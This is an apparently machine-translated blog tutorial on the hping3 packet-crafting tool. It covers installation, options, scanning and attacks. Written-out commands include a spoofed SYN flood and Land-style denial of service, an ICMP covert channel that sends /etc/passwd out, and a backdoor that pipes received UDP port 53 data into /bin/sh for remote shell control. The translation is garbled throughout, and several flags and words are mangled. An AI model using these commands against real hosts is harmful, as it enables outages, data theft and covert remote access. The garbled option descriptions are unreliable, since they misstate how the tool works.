Article From:


Blogger recommendation: more network test related commands concernNetwork test  CollectionlinuxLinux hpingIt is an open source tool for generating and parsing TCPIP protocol packets. The creator is Salvatore Sanfilippo. The latest version is hping3, which supports the use of TCL scripts to invoke its API automatically. Hping is a security audit, firewall testing and other work.The standard tool for making. The advantage of hping is that it can customize the various parts of the packet, so users can flexibly detect the target machine in detail.  


yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
tar zxvf hping3-20051105.tar.gz
cd hping3-20051105
make install


-H --help Show help.-v -VERSION version information.The number of packets sent by -c --count count is about countreached_timeout, which can be edited in hping2.h.-i --intervThe default time for Al packet delivery interval (in milliseconds) is 1 second, which is important for increasing transmission rates, and is also used in idle / spoofing scans. You can refer to hping-howto for more information - fast sends 10 times a secondAccording to the bag.-n -nmeric digital output, symbolic output host address.-q -quiet quit.-I --interface interface name is nothing more than parameters like eth0.-v --verboSe displays a lot of information, TCP responds generally, such as: len=46ip= flags=RADF seq=0 ttl=255 id=0 win=0 rtt=0.4ms tos=0 iplen=40 seq=0 ack=1380893504 sum=2010 urp=0
-D --debug When you get into debug mode, for example, when you encounter something unfamiliar with HPING, you can use this mode to modify HPING, (INTERFACE DETECTION, DATA LINK LAYER ACCESS, INT)ERFACE SETTINGS,...-z --bind The use of shortcut keys.-Z --unbind eliminates shortcuts.-O --rawip RAWIP mode. In this mode, HPING sends the IP head with data.-1 --icmp ICMP mode, HPING will send IGM in this mode.P responder, you can send other type / mode ICMP messages using the --ICMPTYPE --ICMPCODE option.-2 --udp UDP mode, by default, HPING will send UDP message to the host's 0 port, you can use --basThe eport --destport --keep option specifies its pattern.-9 --listen signatuer hping's listen mode, using this mode, HPING will receive the specified data.-a --spoofhostname If you fake an IP attack, the firewall won't record your real IP, and of course you won't receive the packets you respond to.-t --ttltime to live You can specify the TTL value of the package.-H --ipproto chooses IP protocol in RAW IP mode.-w --WINID UNIX ,WINDIWSThe ID responds differently, and this option allows your ID response to be the same as WINDOWS.-r --rel changes ID, which allows ID to decrement output, as shown in HPING-HOWTO.-F --FRAG changes the FRAG of the package, which can test the other side.For packet fragmentation, the default "virtual MTU" is 16 bytes.- X -- morefrag This feature sends fragments to keep the host busy recovering fragments and causes a host denial of service.-y -dontfrag sends an IP that is not recoverable.Fragments, which allows you to learn more about MTU PATH DISCOVERY.-G --fragoff fragment offset valueset the fragment offset
-m --mtu mtu value With this item, the ID value becomes very large, and 50000 does not specify about 3000-20000 of this item.- G -- rroute records routing, sees detailed data, and so on, and can go through up to nine routes, even if the host masks ICMP packets.-C --ICMPTYPEtype Specify the ICMP type, and the default is ICMP.echo REQUEST。
-K --ICMPCODE CODE Specify the ICMP code number, default 0.--icmp-ipver also inserts the IP version into the IP header.--icmp-iphlen sets the length of the IP header by default of 5 (32 bytes).--icmp-iplen sets the length of the IP package.--iCmp-ipid sets the ID of the ICMP message header IP, the default is RANDOM.The default for --icmp-ipproto is TCP.-icmp-cksum Set checksum.-icmp-tsalias for --icmptype 13 (to send ICMP timestamp requests)
--icmp-addr Alias for --icmptype 17 (to send ICMP address mask requests)
-s --baseport source port hping Use the source port to guess the packet that responds, it counts from a base port, and for each packet received, the port adds 1, which you can define yourself.-p --deskport [+][+]desk port sets the destination port with a default of 0. A plus sign is set to: one for each transmission.When a request packet arrives, the port adds 1, and the two plus sign is: one packet per port, plus 1 port number.--keep said above.The size of -w --win is as large as that of windows, 64BYTE.-O --tcpoff Set fakeTCP data offset. Normal data offset is tcphdrlen / 4.-m --tcpseq sets the number of TCP sequences.-l --tcpck sets TCP ack.-Q--seqnum collects serial numbers, which is very helpful for you to analyze TCP serial numbers.


Hping3The following typical functions are applied:

 Firewall test

Use Hping3 to specify various packet fields, and then test the firewall in detail. Please refer to:

Test the firewall’s response to ICMP package and whether it supports it.traceroute、Whether to open a port and DoS attack to the firewall. For example, test the target firewall in the LandAttack way (Land Attack sets the sending source address to the same address as the target, enticing the target machine to build constantly with itselfConnection).  

hping3 -S  -c 1000000 -a -p 21

Port scan

Hping3You can also scan the target port. Hping3 supports the designation of TCP flag bits, length and so on. The following example can be used to detect whether the 80 port of the target machine is open:

hping3 -I eth0  -S -p 80

among-I eth0Specify the use of eth0 port.-SSpecifies the flag bit SYN of the TCP package.-p 80Specifies the destination port of the probe.  

hping3It supports a very rich port detection mode.nmapAlmost all of the scan mode hping3 has support (except connect mode, because Hping3 only sends and receives packets and does not maintain connections, so connect mode detection is not supported). Moreover, Hping3 can make more precise control over sending detection.The user fine-tuning the detection results. Of course, the port scan performance and comprehensive processing capability of Hping3 can not be compared with that of Nmap. In general, it uses only a few ports of a small host to scan.  


IdleIdle Scanning is an anonymous way to scan remote hosts, invented by Salvatore Sanfilippo, author of Hping 3, and is currently implemented in Nmap.  

The scanning principle is: looking for an idle host (which has no network traffic, and the IPID is growing one by one), the attacker host sends the probe packet to the idle host first, and gets its IPID from the reply packet. The IP address of the idle host is sent to the port of the remote host.The SYN package (assumed here as the SYN package) is replied to the SYN / ACK if the destination port of the remote host is open, and the idle host replies to the RST package when it receives the SYN / ACK. Then attack the terminal host and send the probe packet to the idle host to get its IPID. thatBy comparing the IPID values of the two times, we can determine whether the remote host has responded to the packet, thus indirectly inferring its port status.  

Denial of service attack

Using Hping3 can easily build denial of service attacks. For example, a large number of SYN connections were initiated on the target machine, the source address was falsified to, and each SYN packet was sent at an interval of 1000 microseconds.  

hping3 -I eth0 -a192.168.10.99 -S -p 80 -i u1000

Other attacks such as Smurf, teardrop, land attack and so on are also easy to build.  

file transfer

Hping3Support for file transfer through TCP/UDP/ICMP and other packages. It is equivalent to establishing secret tunnel communication with the help of TCP/UDP/ICMP package. The implementation is to open the listening port and parse the contents of the detected signatures (strings specified by the user). At the receiving endOpening service:

hping3 signature --safe  --icmp

Listens to the signature in the ICMP package and resolves the file content according to the signature.  

Send files at the sender using a signed packaged ICMP package:

hping3 ?d 100 --sign signature --file /etc/passwd

take/etc/passwdThe password file is passed to the host through the ICMP packet. The size of the sending packet is 100 bytes (-d 100) and the sending signature is signature (-sign signature).  

Trojan horse function

If Hping3 can be started on a remote host, it can be used as a Trojan to start listening ports and open shell communication after establishing a connection. andnetcatThe back door function is similar.  

Example: Open port 53 locally (DNS parsing service) to listen for packets containing signatures from the host and invoke the received data / bin / sh.  

At the start of the Trojan horse:

hping3 signature --safe --udp -p 53 | /bin/sh

At the remote control terminal:

echo ls >test.cmd
hping3 -p53 -d 100 --udp --sign siganature --file ./test.cmd

Send the file containing LS command with the signature signature to the 53 UDP port of the host, and the packet data length is 100 bytes.  

Of course, it’s just a simple demo, a real-world scenario, where the control side can benefit the shell from performing a lot of advanced and complex operations.

Link of this Article: hping3

Leave a Reply

Your email address will not be published. Required fields are marked *